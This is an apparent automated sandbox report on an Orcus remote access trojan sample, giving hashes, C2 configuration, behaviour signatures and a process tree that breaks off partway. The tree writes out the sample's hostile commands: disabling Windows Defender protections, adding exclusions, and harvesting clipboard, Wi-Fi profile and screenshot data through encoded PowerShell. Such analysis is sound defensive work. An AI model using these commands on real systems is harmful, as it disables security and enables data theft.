Analysis

  • max time kernel
    121s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-02-2025 14:13

Errors

Reason
Machine shutdown

General

  • Target

    8mO5VPmESbC6l1XN8ghS1bX409jT6inx.exe

  • Size

    25KB

  • MD5

    1f8e5cef0742559bc7122d71254a7529

  • SHA1

    5699e66ce3237420a707db83f4462998d3f2902d

  • SHA256

    4056be88c0e703049b52b91bcccfa47f59210363701a2b055aaf0c880b3d13a7

  • SHA512

    f38c163abb7882103ad21404006a296007847eda750a03c73525504bfeb943f20832f5535a67a52bbcd9e6788590272ea34ca004fc560965c001facddc10ff40

  • SSDEEP

    384:g+HOe2ofFzH4WOER07sRcLqQL/9AR9YXrOtUW/gbcPh3w6:52c5UER07fpL/9AR9UvWIbIB

Malware Config

Extracted

Family

orcus

Botnet

Checker

C2

31.44.184.52:64515

Mutex

sudo_gxpx2fq5sk0wew147xrch8my31gbv3uf

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %appdata%\linuxlinuxpython\bigloadtraffic.exe

  • reconnect_delay

    10000

  • registry_keyname

    Sudik

  • taskscheduler_taskname

    sudik

  • watchdog_path

    AppData\aga.exe

Extracted

Family

orcus

Botnet

юзеры

C2

31.44.184.52:15475

Mutex

sudo_7npytx84tbpmsa73tqukm6m5ekld1o5x

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %appdata%\phpjs\loweternal.exe

  • reconnect_delay

    10000

  • registry_keyname

    Sudik

  • taskscheduler_taskname

    sudik

  • watchdog_path

    AppData\aga.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Orcus main payload 2 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Orcurs Rat Executable 4 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 4 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 17 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 9 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:732
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1036
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1064
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1072
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Indicator Removal: Clear Windows Event Logs
                    PID:1208
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1248
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2752
                        • C:\Users\Admin\AppData\Roaming\linuxlinuxpython\bigloadtraffic.exe
                          C:\Users\Admin\AppData\Roaming\linuxlinuxpython\bigloadtraffic.exe
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:1316
                        • C:\Users\Admin\AppData\Roaming\phpjs\loweternal.exe
                          C:\Users\Admin\AppData\Roaming\phpjs\loweternal.exe
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4776
                        • C:\Users\Admin\AppData\Roaming\linuxlinuxpython\bigloadtraffic.exe
                          C:\Users\Admin\AppData\Roaming\linuxlinuxpython\bigloadtraffic.exe
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2292
                        • C:\Users\Admin\AppData\Roaming\phpjs\loweternal.exe
                          C:\Users\Admin\AppData\Roaming\phpjs\loweternal.exe
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5476
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1320
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1336
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1448
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1516
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1528
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1560
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2648
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1636
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1692
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1712
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1788
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1836
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1980
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2004
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:2012
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1740
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2084
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2100
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2228
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2280
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2456
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2464
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2660
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of UnmapMainImage
                                                                        PID:2744
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2784
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:2812
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2828
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2848
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2868
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3116
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3464
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3584
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8mO5VPmESbC6l1XN8ghS1bX409jT6inx.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\8mO5VPmESbC6l1XN8ghS1bX409jT6inx.exe"
                                                                                        2⤵
                                                                                        • Downloads MZ/PE file
                                                                                        • Checks computer location settings
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1444
                                                                                        • C:\Users\Admin\AppData\Local\Temp\dllhost.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3560
                                                                                          • C:\Users\Admin\AppData\Roaming\linuxlinuxpython\bigloadtraffic.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\linuxlinuxpython\bigloadtraffic.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3620
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                              5⤵
                                                                                                PID:2328
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                5⤵
                                                                                                  PID:4284
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4704
                                                                                            • C:\Users\Admin\AppData\Local\Temp\cmd.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:564
                                                                                              • C:\Users\Admin\AppData\Local\Temp\cmd.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3656
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cmd.exe'"
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2120
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cmd.exe'
                                                                                                    6⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:536
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:904
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                    6⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2264
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‏ ‌ .scr'"
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1404
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‏ ‌ .scr'
                                                                                                    6⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4640
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                  5⤵
                                                                                                    PID:3784
                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                      tasklist /FO LIST
                                                                                                      6⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4352
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                    5⤵
                                                                                                      PID:2820
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        tasklist /FO LIST
                                                                                                        6⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4904
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                      5⤵
                                                                                                        PID:1544
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                          6⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4152
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                        5⤵
                                                                                                        • Clipboard Data
                                                                                                        PID:2892
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell Get-Clipboard
                                                                                                          6⤵
                                                                                                          • Clipboard Data
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2496
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                        5⤵
                                                                                                          PID:1100
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            tasklist /FO LIST
                                                                                                            6⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4160
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                          5⤵
                                                                                                            PID:4008
                                                                                                            • C:\Windows\system32\tree.com
                                                                                                              tree /A /F
                                                                                                              6⤵
                                                                                                                PID:2156
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                              5⤵
                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                              PID:4092
                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                netsh wlan show profile
                                                                                                                6⤵
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                PID:1960
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                              5⤵
                                                                                                                PID:4572
                                                                                                                • C:\Windows\system32\systeminfo.exe
                                                                                                                  systeminfo
                                                                                                                  6⤵
                                                                                                                  • Gathers system information
                                                                                                                  PID:4664
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                5⤵
                                                                                                                  PID:3640
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
